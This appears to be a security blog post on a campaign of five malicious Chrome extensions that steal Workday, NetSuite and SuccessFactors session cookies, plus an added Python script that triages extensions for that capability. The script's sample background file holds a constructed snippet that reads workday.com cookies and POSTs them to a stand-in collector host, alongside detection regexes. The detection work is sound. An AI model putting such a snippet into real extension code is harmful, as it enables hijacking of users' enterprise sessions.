5 Malicious Chrome Extensions Enable Session Hijacking in Enterprise HR and ERP Systems
Blog post from Socket
Socket's Threat Research Team uncovered a coordinated campaign of five malicious Chrome extensions that target enterprise HR and ERP platforms such as Workday, NetSuite, and SuccessFactors, with the goal of stealing authentication tokens and taking over accounts. Four of the extensions are published under the name "databycloud1104" and one under "softwareaccess"; together they have more than 2,300 users. Their techniques include cookie exfiltration, DOM manipulation, and session hijacking.

The extensions share infrastructure, carry identical lists for detecting security tools, and split complementary functions among themselves so that standard incident-response actions are obstructed, which makes the threat persistent. Although presented as productivity tools, they steal credentials and block security pages while claiming not to collect user data. They also include anti-analysis mechanisms to evade detection and to keep control of compromised accounts. Socket's investigation is ongoing, and takedown requests have been submitted to Google's Chrome Web Store security team.
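The capability combination the post describes (cookie access scoped to HR/ERP hosts, a remote send path, request blocking, and enumeration of other extensions) can be triaged statically from an unpacked extension before anyone reads the obfuscated code in full. The script below is an added example written for this page; it is not Socket's tooling and not code from the extensions. The sample manifest and scripts are constructed, the regexes and host list are heuristic assumptions rather than indicators from the campaign, and `triage_extension`, `host_matches` and the score weights are names invented here.

```python
"""Static triage of an unpacked Chrome extension for session-hijacking capability.

Added example for this page, not tooling from Socket or from the extensions it
describes. The manifest, scripts, host list and regexes are constructed
heuristics (assumptions), not indicators taken from the campaign.
"""
import json
import re

# HR/ERP domains the post names; an extension wanting cookie access on these
# deserves a closer look (assumption: list is illustrative, extend as needed).
SENSITIVE_HOSTS = ("workday.com", "netsuite.com", "successfactors.com")

# Source-level indicators: key -> (regex, why it matters). Heuristics, not signatures.
CODE_INDICATORS = {
    "cookie_read": (re.compile(r"chrome\.cookies\.getAll|document\.cookie"),
                    "reads cookies"),
    "external_post": (re.compile(r"fetch\(\s*['\"]https?://|XMLHttpRequest|navigator\.sendBeacon"),
                      "sends data to a remote host"),
    "extension_enum": (re.compile(r"chrome\.management\.getAll"),
                       "enumerates installed extensions (security-tool detection)"),
    "dom_injection": (re.compile(r"\.innerHTML\s*=|document\.createElement\(\s*['\"]script"),
                      "rewrites page DOM"),
    "nav_block": (re.compile(r"chrome\.declarativeNetRequest|chrome\.webRequest\.onBeforeRequest"),
                  "can block or rewrite navigations"),
}
SEVERITY = {"high": 3, "medium": 2, "low": 1}


def host_matches(pattern: str, host: str) -> bool:
    """Simplified Chrome match-pattern check: does `pattern` cover `host`?"""
    if pattern == "<all_urls>":
        return True
    m = re.match(r"^(\*|https?|wss?)://([^/]+)/", pattern)
    if not m:
        return False
    h = m.group(2)
    if h == "*":
        return True
    if h.startswith("*."):                      # "*.workday.com" covers the apex and subdomains
        return host == h[2:] or host.endswith(h[1:])
    return host == h


def triage_extension(manifest: dict, scripts: dict) -> dict:
    """Return findings, a numeric score and whether a cookie-theft path is present."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    hosts = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.extend(cs.get("matches", []))

    covered = sorted({h for h in SENSITIVE_HOSTS if any(host_matches(p, h) for p in hosts)})
    if covered and "cookies" in perms:
        findings.append(("high", "cookies permission scoped to " + ", ".join(covered)))
    elif covered:
        findings.append(("medium", "runs on " + ", ".join(covered)))
    if any(p == "<all_urls>" or re.match(r"^\*://\*/", p) for p in hosts):
        findings.append(("medium", "broad host access (<all_urls> or wildcard host)"))
    if perms & {"declarativeNetRequest", "declarativeNetRequestWithHostAccess", "webRequestBlocking"}:
        findings.append(("medium", "can block or redirect requests (e.g. hide security pages)"))
    if "management" in perms:
        findings.append(("medium", "can enumerate other installed extensions"))

    hit = set()
    for name, src in scripts.items():
        for key, (rx, why) in CODE_INDICATORS.items():
            if rx.search(src):
                hit.add(key)
                findings.append(("low", f"{name}: {why} [{key}]"))

    score = sum(SEVERITY[sev] for sev, _ in findings)
    # Cookie permission on a sensitive host plus code that reads cookies and
    # talks to a remote host is the minimal session-exfiltration path.
    theft_path = "cookies" in perms and bool(covered) and {"cookie_read", "external_post"} <= hit
    return {"score": score, "findings": findings, "session_theft_path": theft_path}


# Constructed sample: a "productivity" extension with the permission shape discussed above.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 3,
  "name": "Cloud Data Helper",
  "permissions": ["cookies", "storage", "declarativeNetRequest", "management"],
  "host_permissions": ["*://*.workday.com/*", "*://*.netsuite.com/*", "https://*.successfactors.com/*"],
  "content_scripts": [{"matches": ["*://*.workday.com/*"], "js": ["content.js"]}],
  "background": {"service_worker": "bg.js"}
}
""")
SAMPLE_SCRIPTS = {  # constructed, not code from the campaign
    "bg.js": """
chrome.cookies.getAll({domain: "workday.com"}, function(cs) {
  fetch("https://collector.example/api", {method: "POST", body: JSON.stringify(cs)});
});
chrome.management.getAll(function(exts) { /* compare names against a blocklist */ });
""",
    "content.js": """
document.body.innerHTML = document.body.innerHTML.replace("Sign out", "");
""",
}

if __name__ == "__main__":
    report = triage_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS)
    print("score:", report["score"], "session_theft_path:", report["session_theft_path"])
    for sev, msg in report["findings"]:
        print(f"  [{sev}] {msg}")
```

Run it against a directory unpacked from a `.crx` (or Chrome's `Extensions/<id>/<version>/` folder) by loading `manifest.json` and the `.js` files it references. A high score is a reason to read the code, not a verdict: legitimate SSO helpers also hold `cookies` on SaaS hosts, which is why the `session_theft_path` flag requires the permission, the cookie read and the remote send together.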